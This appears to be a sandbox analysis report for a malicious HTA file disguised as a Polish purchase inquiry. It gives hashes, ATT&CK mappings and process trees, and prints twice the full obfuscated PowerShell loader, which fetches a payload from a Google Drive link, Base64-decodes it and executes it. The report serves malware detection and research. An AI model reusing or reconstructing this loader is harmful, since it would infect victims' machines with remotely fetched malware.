2cfcef680c74b85a3ad26c9bad6052159367c590779836ed188878f4fb68222d

General

Target

Zapytanie ofertowe FläktGroup 04232024.hta
Size

8KB
MD5

2902e59a601e8269cd047c9ca8fd83b5
SHA1

68aff592ebb1ca4ec3bd1a46bad4370d37150fc3
SHA256

2cfcef680c74b85a3ad26c9bad6052159367c590779836ed188878f4fb68222d
SHA512

ae2155a960d9caf80a5094c59d31e66257d84f56ce19105468e86abe234cc02c92f3169d5e8d7f19e2d1396781a98d53d55d3eca73b3e12010dd235930d8c296
SSDEEP

192:PETfW8pbPBaG5MNM80uHkYub+RjYVpkp6skCwf:PUfW86XNn0Wxub+RjYPNTf

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

22 728 powershell.exe
31 728 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation mshta.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

20 drive.google.com
22 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2684 540 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

728 powershell.exe
728 powershell.exe
540 powershell.exe
540 powershell.exe
540 powershell.exe
540 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 728 powershell.exe
Token: SeDebugPrivilege 540 powershell.exe

flow	pid	process
22	728	powershell.exe
31	728	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	mshta.exe

flow	ioc
20	drive.google.com
22	drive.google.com

pid	pid_target	process	target process
2684	540	WerFault.exe	powershell.exe

pid	process
728	powershell.exe
728	powershell.exe
540	powershell.exe
540	powershell.exe
540	powershell.exe
540	powershell.exe

description	pid	process
Token: SeDebugPrivilege	728	powershell.exe
Token: SeDebugPrivilege	540	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

mshta.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1500 wrote to memory of 728	1500	mshta.exe	powershell.exe
PID 1500 wrote to memory of 728	1500	mshta.exe	powershell.exe
PID 1500 wrote to memory of 728	1500	mshta.exe	powershell.exe
PID 728 wrote to memory of 2876	728	powershell.exe	cmd.exe
PID 728 wrote to memory of 2876	728	powershell.exe	cmd.exe
PID 728 wrote to memory of 2876	728	powershell.exe	cmd.exe
PID 728 wrote to memory of 540	728	powershell.exe	powershell.exe
PID 728 wrote to memory of 540	728	powershell.exe	powershell.exe
PID 728 wrote to memory of 540	728	powershell.exe	powershell.exe
PID 540 wrote to memory of 4100	540	powershell.exe	cmd.exe
PID 540 wrote to memory of 4100	540	powershell.exe	cmd.exe
PID 540 wrote to memory of 4100	540	powershell.exe	cmd.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Zapytanie ofertowe FläktGroup 04232024.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1500

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g sortrHermauWe,rynProcrdStrmklsplenaToretg,palieLlenmnSad seReymo=Geno.$Ba.baChardshInteroHematrSubthi Uno oNeu rr I,paeBokeftFestoiEthyln Joura Gre lSamt,.PicarsIndpapJungplBen eiTernetHjt a(Tando$TransRUnparoDisposPhysoeInterlscl riPectolShims)Absal ');$Chorioretinal=$Administrationsgrundlagene[0];Vinddrejning (Nejsigerens 'Kapit$Turn g bl.mlPre.eoUn ebbP,inkastatel Unsy:FirehSGlds,aDe,aunVriddeLanchrExtraiBonkanknevlgNatursBill pKompelBundlaMesennVommeeLand.rcaptanCi rieoverg=Dr coNLighteKlammw boid- FeriOSammeb Respj Evine Pu,sc euphtDans B vbnS PresyRi.orsFort.t,tlasenephem.imch.DigalNCattleUopfotOply..Ego iWH lsteCertibrbestCL vgilFraskiMisaweCtenonRecipt pseu ');Vinddrejning (Nejsigerens 'Non e$SkindSParacaSer nnGudsdeMagisrSubpoiAreoln vendgCongos Inclp Exhal,ehelaS,irinArisaeStilfrBubblnOpsvueGenne.ForfiHsequee,odsiaFo.jad M,dve M,farBil is.arou[Unhon$V preAEquincLavricUdhunoAcma uAfklipInd.bl tufe TracmCalcue Re tnUdviktDoven]Outcu=Hydr,$SalsoSHa dee illwdgr.deiOveremStok,eTherinHocust ordpe.uthytU val ');$Udgangsstrm250=Nejsigerens 'MaryaSOverfa OptonTulipeHe.herEnergi cattn ConfgReaccsLeatmpSkammlkrvelaetelcnCoveneRocksrE,hnonShoole,reva.BindhDSt.teoO svbwFartsnfjernlNe,orounfaba,otundPan cF,romaiHurrolKrit eBlank(Buest$CulpaCApochh,agsdoFarverEnhydiMa,tioUngagrShabreredeltStimaiHassen bukka M.dnlAma t,.phol$Spli C AfskoBe,ttc StrekPaaref,alloisulphg TnkehUndert.estriStartnHeathg Rodo) ,ndh ';$Udgangsstrm250=$Cadeauer[1]+$Udgangsstrm250;$Cockfighting=$Cadeauer[0];Vinddrejning (Nejsigerens 'Sondr$SpraigUpgirlFod,ro MiddbMonocaU ganl,idst:PressTRomani FremlSikkefM.stmr afbaeopsnad OdonsUnderhb ssie lycedF,ikieFre.vrDdskrnVentreTaaresStudi=Stikb( emhuTNabobeBlaals Mid tDep,r- HypePRejeraMeedltSubpahKuvse ,nstr$SpidsCS,mmeoGeyercBuzzikNetvrf ChariTilf.g Byrah OdestLikvii VerbnBackwgRnneb)Dilan ');while (!$Tilfredshedernes) {Vinddrejning (Nejsigerens 'Deepf$UndergUnscal Bseso,yperb VigeaSof wlLav n:EsbjeUReflenForn.dAestueDodecr.pokefSirtsuUnm,tlGennedOrthotApusp= Tare$Preapt ReecrSwelpu Boa.eFragr ') ;Vinddrejning $Udgangsstrm250;Vinddrejning (Nejsigerens 'YauldSMaxyut,taova ShahrHippotSk ep-,nsigSnatiolAsthmeStjfrePirnapFante Tredj4Pir.e ');Vinddrejning (Nejsigerens 'Misco$ForedgrdliglP,rcho C,nvbBysv,aSeleklEf.er:Sag,eTPle.iiCo,stlYapnefTe nirSkak,eHangadPsorisFalsihCentreWinkld Perce Skobr HowenBegroeornitsK,der=Holde(Bat.rT Pi oeFo.rissejertLa.rs-I.surPDi,feaHarqutPyre.hDacke Priva$Un,veC Trb.oVerdecCorevkD,lemf LageiBe,mtg SaddhSlyngtHydroiHaandn Litug Tyf,)Un us ') ;Vinddrejning (Nejsigerens 'Deant$IonizgLemlslMahogo KommbHex.ca Preal Myre:Forb.AA pecg b.artSupereRecoprKh ziiRosennA aled Co,k= Prfe$MisvigTocyllEmpi oPompsbBrofoa Ma.ilBounc:EpalebPoes eExo irWrenciSk ttgCanoneKonebrRetou+Kokon+Nonil%Besky$,ksisA Fretdraad,mSamariPreamnVilloi,ndsts.ryset Aetor VildaAmycltF.ndeiAtomloFrdignatamas P rsg PladrEuropuKorrenHulladAfstelPhospa .ymbgS,ende aspanexpere Hydr.ReinccNeocooBesmou P.trnExcomtFldef ') ;$Chorioretinal=$Administrationsgrundlagene[$Agterind];}Vinddrejning (Nejsigerens ' K,ag$at.mag Sjofl PersoE pirbVidnea Pulil Meta:PenteRpaletoandeliTvetus Br.ut StareA.roer,raadsAsthm Intra= .nir Cr,ptGPap.le Nondt Prom-.nterCConfro RutenU,trytFjante UnmonDivert A.en Lrerr$ Cen,CDr,kno,knhec,enezkUnd rfRentaiRegnegs.ralhUdlantSpad,iRhinsnTopvigEbo,s ');Vinddrejning (Nejsigerens 'Pois $.entigUndaml H,ppo Cr,sbduaneasystelTermi:raa aURaketnInge.hBairna .piprKldedmFagalfTaageuSeniolOstrilExhibysvali Velsi=Under Xanth[to.deSCytoly KrabsForcet Eksie UnidmPlatf.lykkeCS kuloFinann Nonfv preaeBloter AnimtMarti] ,ntg:Acant:Arb,jFSo.iorG,baroNe,stm FortBSandwaIndets GifteBorte6 Stvb4BarnaS R,ngtRander R,tii .undnAffalg oug(Tonef$Sk wsRInexpoGrundi Pu.dsBarbatHjemmeAg,larLektis .edt)Gardi ');Vinddrejning (Nejsigerens 'Apish$DermogRemedlGreeko,isjobMismoa.ynodlBiolo:Harpek BollojodtifOphidfPippieCalumrSkam,d CrimaAquarmAg,oss Tilf ,ity=Releg Cresc[B.arbS Aftey InspsBrandtPatruePleurmBeski.BjergTRyddeeoriolx.ortftStr,e.UperiE KrybnEarricsartioDd.stdOutsliGalganelektgKera.]Pelti:semiv:udtryA DuodS .ettCUsa,aITipvoIFordy.UnhouGHunkneTo.tftM.tchSAbsintNon irVermii,arginChansg.jenl(Ball,$SexolU,orhanTubulhSyle aTenotrFortomMur,rfUn aru StralSelv,lDistry Muil)Husst ');Vinddrejning (Nejsigerens 'Latyr$B dcygArri lPolyboZooglbS raaa.ljfnlIrr s:UngnaCHjertiBurkisHenvicLed loCharteSma.tsTh.ot=Serve$ SplakFris.oRandifRakkefDr nceSvendrKlassdreforaRibbimMoists,enyt.ForresKomb u uninbMinhasChayotKolonrDat liBarbenIntimgdet,s(Pleur2ep.pg9Simul8Nonco9 Ufre6 Hype4Prod,,i ter2 tepd9Firdo3Bemal6Seric6Tekst) Koto ');Vinddrejning $Ciscoes;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:728

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lactoscope.cla && echo $"
3⤵
PID:2876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g sortrHermauWe,rynProcrdStrmklsplenaToretg,palieLlenmnSad seReymo=Geno.$Ba.baChardshInteroHematrSubthi Uno oNeu rr I,paeBokeftFestoiEthyln Joura Gre lSamt,.PicarsIndpapJungplBen eiTernetHjt a(Tando$TransRUnparoDisposPhysoeInterlscl riPectolShims)Absal ');$Chorioretinal=$Administrationsgrundlagene[0];Vinddrejning (Nejsigerens 'Kapit$Turn g bl.mlPre.eoUn ebbP,inkastatel Unsy:FirehSGlds,aDe,aunVriddeLanchrExtraiBonkanknevlgNatursBill pKompelBundlaMesennVommeeLand.rcaptanCi rieoverg=Dr coNLighteKlammw boid- FeriOSammeb Respj Evine Pu,sc euphtDans B vbnS PresyRi.orsFort.t,tlasenephem.imch.DigalNCattleUopfotOply..Ego iWH lsteCertibrbestCL vgilFraskiMisaweCtenonRecipt pseu ');Vinddrejning (Nejsigerens 'Non e$SkindSParacaSer nnGudsdeMagisrSubpoiAreoln vendgCongos Inclp Exhal,ehelaS,irinArisaeStilfrBubblnOpsvueGenne.ForfiHsequee,odsiaFo.jad M,dve M,farBil is.arou[Unhon$V preAEquincLavricUdhunoAcma uAfklipInd.bl tufe TracmCalcue Re tnUdviktDoven]Outcu=Hydr,$SalsoSHa dee illwdgr.deiOveremStok,eTherinHocust ordpe.uthytU val ');$Udgangsstrm250=Nejsigerens 'MaryaSOverfa OptonTulipeHe.herEnergi cattn ConfgReaccsLeatmpSkammlkrvelaetelcnCoveneRocksrE,hnonShoole,reva.BindhDSt.teoO svbwFartsnfjernlNe,orounfaba,otundPan cF,romaiHurrolKrit eBlank(Buest$CulpaCApochh,agsdoFarverEnhydiMa,tioUngagrShabreredeltStimaiHassen bukka M.dnlAma t,.phol$Spli C AfskoBe,ttc StrekPaaref,alloisulphg TnkehUndert.estriStartnHeathg Rodo) ,ndh ';$Udgangsstrm250=$Cadeauer[1]+$Udgangsstrm250;$Cockfighting=$Cadeauer[0];Vinddrejning (Nejsigerens 'Sondr$SpraigUpgirlFod,ro MiddbMonocaU ganl,idst:PressTRomani FremlSikkefM.stmr afbaeopsnad OdonsUnderhb ssie lycedF,ikieFre.vrDdskrnVentreTaaresStudi=Stikb( emhuTNabobeBlaals Mid tDep,r- HypePRejeraMeedltSubpahKuvse ,nstr$SpidsCS,mmeoGeyercBuzzikNetvrf ChariTilf.g Byrah OdestLikvii VerbnBackwgRnneb)Dilan ');while (!$Tilfredshedernes) {Vinddrejning (Nejsigerens 'Deepf$UndergUnscal Bseso,yperb VigeaSof wlLav n:EsbjeUReflenForn.dAestueDodecr.pokefSirtsuUnm,tlGennedOrthotApusp= Tare$Preapt ReecrSwelpu Boa.eFragr ') ;Vinddrejning $Udgangsstrm250;Vinddrejning (Nejsigerens 'YauldSMaxyut,taova ShahrHippotSk ep-,nsigSnatiolAsthmeStjfrePirnapFante Tredj4Pir.e ');Vinddrejning (Nejsigerens 'Misco$ForedgrdliglP,rcho C,nvbBysv,aSeleklEf.er:Sag,eTPle.iiCo,stlYapnefTe nirSkak,eHangadPsorisFalsihCentreWinkld Perce Skobr HowenBegroeornitsK,der=Holde(Bat.rT Pi oeFo.rissejertLa.rs-I.surPDi,feaHarqutPyre.hDacke Priva$Un,veC Trb.oVerdecCorevkD,lemf LageiBe,mtg SaddhSlyngtHydroiHaandn Litug Tyf,)Un us ') ;Vinddrejning (Nejsigerens 'Deant$IonizgLemlslMahogo KommbHex.ca Preal Myre:Forb.AA pecg b.artSupereRecoprKh ziiRosennA aled Co,k= Prfe$MisvigTocyllEmpi oPompsbBrofoa Ma.ilBounc:EpalebPoes eExo irWrenciSk ttgCanoneKonebrRetou+Kokon+Nonil%Besky$,ksisA Fretdraad,mSamariPreamnVilloi,ndsts.ryset Aetor VildaAmycltF.ndeiAtomloFrdignatamas P rsg PladrEuropuKorrenHulladAfstelPhospa .ymbgS,ende aspanexpere Hydr.ReinccNeocooBesmou P.trnExcomtFldef ') ;$Chorioretinal=$Administrationsgrundlagene[$Agterind];}Vinddrejning (Nejsigerens ' K,ag$at.mag Sjofl PersoE pirbVidnea Pulil Meta:PenteRpaletoandeliTvetus Br.ut StareA.roer,raadsAsthm Intra= .nir Cr,ptGPap.le Nondt Prom-.nterCConfro RutenU,trytFjante UnmonDivert A.en Lrerr$ Cen,CDr,kno,knhec,enezkUnd rfRentaiRegnegs.ralhUdlantSpad,iRhinsnTopvigEbo,s ');Vinddrejning (Nejsigerens 'Pois $.entigUndaml H,ppo Cr,sbduaneasystelTermi:raa aURaketnInge.hBairna .piprKldedmFagalfTaageuSeniolOstrilExhibysvali Velsi=Under Xanth[to.deSCytoly KrabsForcet Eksie UnidmPlatf.lykkeCS kuloFinann Nonfv preaeBloter AnimtMarti] ,ntg:Acant:Arb,jFSo.iorG,baroNe,stm FortBSandwaIndets GifteBorte6 Stvb4BarnaS R,ngtRander R,tii .undnAffalg oug(Tonef$Sk wsRInexpoGrundi Pu.dsBarbatHjemmeAg,larLektis .edt)Gardi ');Vinddrejning (Nejsigerens 'Apish$DermogRemedlGreeko,isjobMismoa.ynodlBiolo:Harpek BollojodtifOphidfPippieCalumrSkam,d CrimaAquarmAg,oss Tilf ,ity=Releg Cresc[B.arbS Aftey InspsBrandtPatruePleurmBeski.BjergTRyddeeoriolx.ortftStr,e.UperiE KrybnEarricsartioDd.stdOutsliGalganelektgKera.]Pelti:semiv:udtryA DuodS .ettCUsa,aITipvoIFordy.UnhouGHunkneTo.tftM.tchSAbsintNon irVermii,arginChansg.jenl(Ball,$SexolU,orhanTubulhSyle aTenotrFortomMur,rfUn aru StralSelv,lDistry Muil)Husst ');Vinddrejning (Nejsigerens 'Latyr$B dcygArri lPolyboZooglbS raaa.ljfnlIrr s:UngnaCHjertiBurkisHenvicLed loCharteSma.tsTh.ot=Serve$ SplakFris.oRandifRakkefDr nceSvendrKlassdreforaRibbimMoists,enyt.ForresKomb u uninbMinhasChayotKolonrDat liBarbenIntimgdet,s(Pleur2ep.pg9Simul8Nonco9 Ufre6 Hype4Prod,,i ter2 tepd9Firdo3Bemal6Seric6Tekst) Koto ');Vinddrejning $Ciscoes;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:540

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lactoscope.cla && echo $"
4⤵
PID:4100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 540 -s 2308
4⤵
- Program crash
PID:2684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 540 -ip 540
1⤵
PID:4732

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f5rt45om.exb.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Lactoscope.cla
Filesize
427KB

MD5
89cf569d410d4ac83b4a6976bc8c654f

SHA1
00684e14bf051a640b28db8fe15c15c461fea56c

SHA256
57db26e7f84879e048490f3179c7e15d44c63a9727faf9604a61f44d3b98fa0e

SHA512
2751ead9e94d7db6ea28937180458f1f6c04b41b4eab1432972719f961ad6a652c10cff8a35a7209fbec5c82a1fadbbaef1b80af98f557e2133133da34440964

Download Submit
memory/540-40-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/540-27-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/540-29-0x0000000004970000-0x0000000004980000-memory.dmp

Filesize
64KB

Download
memory/540-28-0x0000000004970000-0x0000000004980000-memory.dmp

Filesize
64KB

Download
memory/728-19-0x0000000006540000-0x000000000658C000-memory.dmp

Filesize
304KB

Download
memory/728-23-0x00000000076D0000-0x00000000076F2000-memory.dmp

Filesize
136KB

Download
memory/728-17-0x0000000006000000-0x0000000006354000-memory.dmp

Filesize
3.3MB

Download
memory/728-6-0x0000000005DE0000-0x0000000005E46000-memory.dmp

Filesize
408KB

Download
memory/728-0-0x0000000002B70000-0x0000000002BA6000-memory.dmp

Filesize
216KB

Download
memory/728-18-0x0000000006500000-0x000000000651E000-memory.dmp

Filesize
120KB

Download
memory/728-21-0x0000000006AA0000-0x0000000006ABA000-memory.dmp

Filesize
104KB

Download
memory/728-20-0x0000000007D50000-0x00000000083CA000-memory.dmp

Filesize
6.5MB

Download
memory/728-22-0x00000000077B0000-0x0000000007846000-memory.dmp

Filesize
600KB

Download
memory/728-7-0x0000000005E50000-0x0000000005EB6000-memory.dmp

Filesize
408KB

Download
memory/728-24-0x0000000008980000-0x0000000008F24000-memory.dmp

Filesize
5.6MB

Download
memory/728-5-0x00000000054F0000-0x0000000005512000-memory.dmp

Filesize
136KB

Download
memory/728-1-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/728-2-0x0000000002D00000-0x0000000002D10000-memory.dmp

Filesize
64KB

Download
memory/728-4-0x0000000005740000-0x0000000005D68000-memory.dmp

Filesize
6.2MB

Download
memory/728-3-0x0000000002D00000-0x0000000002D10000-memory.dmp

Filesize
64KB

Download
memory/728-43-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing